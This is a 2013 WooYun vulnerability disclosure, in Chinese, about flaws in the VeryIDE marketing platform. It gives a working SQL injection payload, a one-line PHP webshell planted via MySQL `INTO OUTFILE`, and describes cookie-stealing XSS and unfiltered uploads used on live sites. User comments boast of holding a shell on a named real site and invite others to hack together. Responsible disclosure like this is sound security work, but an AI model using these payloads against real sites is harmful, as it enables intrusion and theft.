当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026904

漏洞标题:VeryIDE互动营销平台一系列问题,N多门户、地方网站中招

相关厂商:veryide.com

漏洞作者: if、so

提交时间:2013-07-03 12:03

修复时间:2013-08-17 12:04

公开时间:2013-08-17 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-03: 细节已通知厂商并且等待厂商处理中
2013-07-04: 厂商已经确认,细节仅向厂商公开
2013-07-07: 细节向第三方安全合作伙伴开放
2013-08-28: 细节向核心白帽子及相关领域专家公开
2013-09-07: 细节向普通白帽子公开
2013-09-17: 细节向实习白帽子公开
2013-08-17: 细节向公众公开

简要描述:

VeryIDE 是一套开源的 Web 应用平台,搭建于php+mysql,面向地方社区和垂直行业网站,为其提供互动营销支持。这个系统可以和许多门户、BBS完美结合在一起,可以增加调查问卷,广告之类,安全做不好,可想而知。

详细说明:

1.存储型跨站:
当时我在尝试渗透我们这的的地方门户,发现bbs有个调查问卷,我便随便插了个跨站代码,结果收到了cookie。

111.png

,后来打开这个域名,原来是这个系统

111.png

2.表单POST注入:如图,这样提交就会报错,

111.png

111.png

,貌似有点难住的样子。。感谢L.N同学。payload:

qqq',(select (1) from information_schema.tables where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select version())),1,62)))a from information_schema.tables group by a)b)),0,1370615079,1)#

111.png

,用户密码加密方式为md5加密方式,密码不复杂的情况下可解出。
3.后台设计不严谨:在一些涉及数据库ftp之类的账号配置信息时,veryide设计不严谨,可查看源码获得密码:

111.png

,这个系统可以和论坛绑定,所以,看图,不多说,万一数据库开启外联,主站也挂了

111.png


4.getshell部分:veryide在后台提供了一个更新的模块,可以执行sql语句:

111.png

,当我们的mysql权限较大时,可以直接导出shell:

Select '<? php eval($_POST[cmd]);?>' into outfile 'x:/yourpath/1.php';

,本机测试成功,当然实际测试的时候有的当前的mysql权限较小不成功。在第三点提到的,当我们获得数据库信息时,如果目标开启了数据库外联,也有可能拿到wenshell。
5.漏网之鱼。veryide的后台其他安全做的不错,上传过滤的不错,可是却在生成表单时出了问题,当表单里有上传动能时,那就要恭喜你,没有过滤,you can getshell,

111.png

,可是怎么获得shell路径了?那就要感谢后台贴心的安全功能模块了,扫描webshell即可,--。

111.png


这个系统涉及用户非常广,官方案例展示http://www.veryide.com/case.php,亮瞎我的x眼,安全性真的不敢恭维,用特征url google一下,

111.png

,20w条结果!!!为什么这个系统到现在么有爆出安全问题了,原因估计是他一般生成表单,调查问卷之类,难以被发现。

漏洞证明:

111.png

111.png


<img src="upload/201306/25205158be0a89c71a5d8565eef106d266ba0aa4.png" alt="111.png" />,

111.png


111.png

修复方案:

2800元一套的系统肯定请得起安全人员

版权声明:转载请注明来源 if、so@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-04 11:57

厂商回复:

谢谢 @if、so 对此 Bug 的报告,VeryIDE 正在制作相应的补丁程序,近期会对外发并通知各网站主更新。
再次谢谢各位白帽子的关注与支持,另外,恳请大家不要伤害各网站同仁。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-26 16:09 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @xsser 给个雷撒

  2. 2013-06-27 08:54 | kimdle ( 路人 | Rank:0 漏洞数:1 | @kimdle)

    @if、so 果然存在。。。。

  3. 2013-08-29 19:31 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    表示520zg.net是我老家的网站 我手里已有shell 0 0 骗人是小狗。

  4. 2013-12-14 22:33 | jaojan ( 路人 | Rank:21 漏洞数:10 | xss my life)

    基佬,来一发爆管理员密码语句

  5. 2015-03-27 15:43 | 乌云白帽子 ( 路人 | Rank:11 漏洞数:4 | 路人甲)

    @Black Angel 额、你也是自贡的?我在拿西秦的站、来一起搞不?